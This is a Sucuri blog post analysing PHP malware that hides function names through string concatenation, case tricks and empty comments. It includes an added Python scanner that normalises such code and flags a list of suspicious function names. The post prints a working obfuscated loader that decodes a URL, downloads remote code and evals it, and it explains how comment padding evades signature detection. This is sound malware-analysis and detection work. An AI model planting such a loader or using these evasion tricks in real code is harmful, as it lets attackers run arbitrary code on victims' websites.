Sucuri Blog
String Concatenation: Obfuscation Techniques

August 12, 2020Krasimir Konov

String concatenation has plenty of legitimate uses in development, but it is also a popular way for attackers to obfuscate code and make it harder to detect. Let's dig into how bad actors leverage this technique to conceal their malware.

Avoiding Detection with String Concatenation

In PHP the period is the string concatenation operator: 'a'.'b' evaluates to ab. Obfuscated malware splits a sensitive name into many short literals joined with periods, so that the file on disk never contains the name itself. For example, 'cr'.'ea'.'te'.'_f'.'un'.'c'.'ti'.'o'.'n' only becomes create_function when the script runs, and because PHP allows a string variable to be called as a function ($a(...)), the assembled name can be invoked directly. The point is to keep tokens such as base64_decode, eval and file_get_contents, which are commonly used for malicious activity and therefore commonly searched for, out of the source text.

<?php
// The fragments join to the string "create_function" at runtime
$a = 'cr'.'ea'.'te'.'_f'.'un'.'c'.'ti'.'o'.'n';
// $a('$a', ...) is create_function('$a', <body>); the body fragments join to
// EvAl(file_get_contents(base64_decode(<base64 URL>))); and each /**/ is an empty comment
$f = $a('$a', 'E'./**/'v'.'A'./**/'l'.'(fil'.'e_g'.'et_c'.'onte'.'nts'.'(b'.'as'.'e6'.'4_d'.'ec'.'od'.'e'.'("a'.'HR'.'0cDovL2'.'5hdGl2ZXJlZ'.'GlyLnR'.'rL2x4LzEu'.'dHh0")));');
$f(1); // call the generated function: fetch the remote file and eval its contents
?>

In this example, the malware assembles the string 'create_function' and then the function body 'EvAl(file_get_contents(base64_decode(' from short fragments. Note the mixed case in EvAl: PHP keywords and function names are case-insensitive, so this still executes as eval, but it does not match a case-sensitive search for the word eval. (create_function itself was deprecated in PHP 7.2 and removed in PHP 8.0, so this particular sample only runs on PHP 7.x and earlier.)

The base64 string decodes to the URL hxxp://nativeredir[.]tk/lx/1.txt. file_get_contents downloads that file (this works whenever allow_url_fopen is enabled, which is PHP's default), and the result is passed to eval and executed. Fetching the payload from a remote server keeps control with the attackers and gives them flexibility: they can change the code that runs on the victim site at any time simply by replacing 1.txt, without ever touching the infected file again.

Pulling external code in this manner is common practice. In many cases the hosting location is another compromised website that has been repurposed to distribute malware. We have also seen services like Pastebin and GitHub used to host malicious code for the same purpose.

The code can also be padded with comments in arbitrary places, as in the example above: /**/ is an empty PHP comment, which the parser discards, so it can be inserted between any two tokens (here between concatenated fragments) without changing behaviour. This defeats detection that relies on exact byte sequences found in earlier samples, which is how many malware removal tools work. One popular method is to run the malware through a tool that sprinkles random comments throughout it, so that every copy has a slightly different fingerprint and is harder to match.
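The following scanner is an added example written for this post, not Sucuri's own tooling. It does what a plain search for eval or file_get_contents cannot: it strips PHP comments (including the empty /**/ trick), folds every run of literal . literal into a single literal, and only then matches function names, case-insensitively, so EvAl is caught as well. Run on the sample above, which is embedded as constructed input, it recovers create_function and EvAl(file_get_contents(base64_decode(...))) and decodes the base64 URL. The list of suspicious names is an assumption chosen for the example, and heredoc strings and line comments terminated by ?> are deliberately not handled.

```python
"""Normalizer for PHP string-concatenation obfuscation (added example, not Sucuri tooling).

Strips PHP comments, folds runs of  literal . literal  into one literal, and only then
looks for the function names the malware was hiding.  Heredoc/nowdoc strings and
line comments terminated by ?> are not handled (simplification for the example).
"""
import base64
import binascii
import re

# Names worth flagging once the file is normalised.  This list is an assumption
# chosen for the example, not a signature set from the post.
SUSPICIOUS = ("eval", "create_function", "assert", "file_get_contents",
              "base64_decode", "system", "shell_exec", "passthru")
NAME_RE = re.compile(r"\b(?:" + "|".join(SUSPICIOUS) + r")\b", re.IGNORECASE)
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed input: the sample from the post, embedded verbatim.
SAMPLE = r"""<?php
$a = 'cr'.'ea'.'te'.'_f'.'un'.'c'.'ti'.'o'.'n';
$f = $a('$a', 'E'./**/'v'.'A'./**/'l'.'(fil'.'e_g'.'et_c'.'onte'.'nts'.'(b'.'as'.'e6'.'4_d'.'ec'.'od'.'e'.'("a'.'HR'.'0cDovL2'.'5hdGl2ZXJlZ'.'GlyLnR'.'rL2x4LzEu'.'dHh0")));');
$f(1);
?>"""


def tokenize(src):
    """Split source into ('str', body, quote) and ('code', text) tokens; comments are dropped."""
    tokens, buf, i, n = [], [], 0, len(src)

    def flush():
        if buf:
            tokens.append(("code", "".join(buf)))
            buf.clear()

    while i < n:
        c = src[i]
        if c in "'\"":                      # quoted literal; a backslash escapes the next char
            flush()
            j = i + 1
            while j < n and src[j] != c:
                j += 2 if src[j] == "\\" else 1
            tokens.append(("str", src[i + 1:j], c))
            i = j + 1
        elif src.startswith("/*", i):       # block comment, including the empty /**/ trick
            end = src.find("*/", i + 2)
            i = n if end < 0 else end + 2
        elif src.startswith("//", i) or c == "#":   # line comment
            end = src.find("\n", i)
            i = n if end < 0 else end
        else:
            buf.append(c)
            i += 1
    flush()
    return tokens


def fold_concatenation(tokens):
    """Merge  literal . literal  runs (whitespace allowed around the dot) into one literal."""
    out = []
    for tok in tokens:
        if (tok[0] == "str" and len(out) >= 2 and out[-2][0] == "str"
                and out[-1][0] == "code" and out[-1][1].strip() == "."):
            _, body, quote = out[-2]
            out[-2] = ("str", body + tok[1], quote)   # keep the first literal's quote style
            out.pop()                                  # drop the '.' token
        else:
            out.append(tok)
    return out


def normalize(src):
    """Return the source with comments removed and literal concatenations folded."""
    parts = []
    for tok in fold_concatenation(tokenize(src)):
        parts.append(tok[1] if tok[0] == "code" else tok[2] + tok[1] + tok[2])
    return "".join(parts)


def decode_base64_literals(text):
    """Return printable ASCII decodings of base64-looking runs (e.g. the hidden URL)."""
    found = []
    for m in B64_RE.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            found.append(decoded)
    return found


def scan(src):
    """Normalise, then report suspicious names (lower-cased) and decoded base64 strings."""
    normalized = normalize(src)
    hits = sorted({m.group(0).lower() for m in NAME_RE.finditer(normalized)})
    return {"normalized": normalized, "hits": hits,
            "decoded": decode_base64_literals(normalized)}


if __name__ == "__main__":
    report = scan(SAMPLE)
    print(report["normalized"])
    print("suspicious names:", ", ".join(report["hits"]))
    print("decoded literals:", report["decoded"])
```

The scanner reports base64_decode, create_function, eval and file_get_contents for the sample even though none of those strings occurs contiguously in the original file, and it decodes the URL the payload is fetched from. Because the folded body is still just a string, a production version would recurse into string literals that themselves look like PHP code, and would treat a decoded URL as an indicator to pivot on rather than something to fetch.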

Applications of String Concatenation in Malware

While in this particular case the remote code injected hidden spam links into the victim's website, scripts of this kind can run any malware or phishing payload the attacker chooses, and the code at the remote URL can be modified at will to meet their requirements.

Samples like these clearly highlight how easy it is for attackers to obfuscate code. If you are the DIY type and are cleaning malware from your own website, you might search the files for eval or file_get_contents, but in this case you will not find either string: neither appears contiguously anywhere in the code.

We’re always happy to help if you need a hand with malware cleanup.

Categories: Security Education, Sucuri Labs, Website Malware Infections, Website Security
Tags: Black Hat Tactics, Hacked Websites, Obfuscation

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.
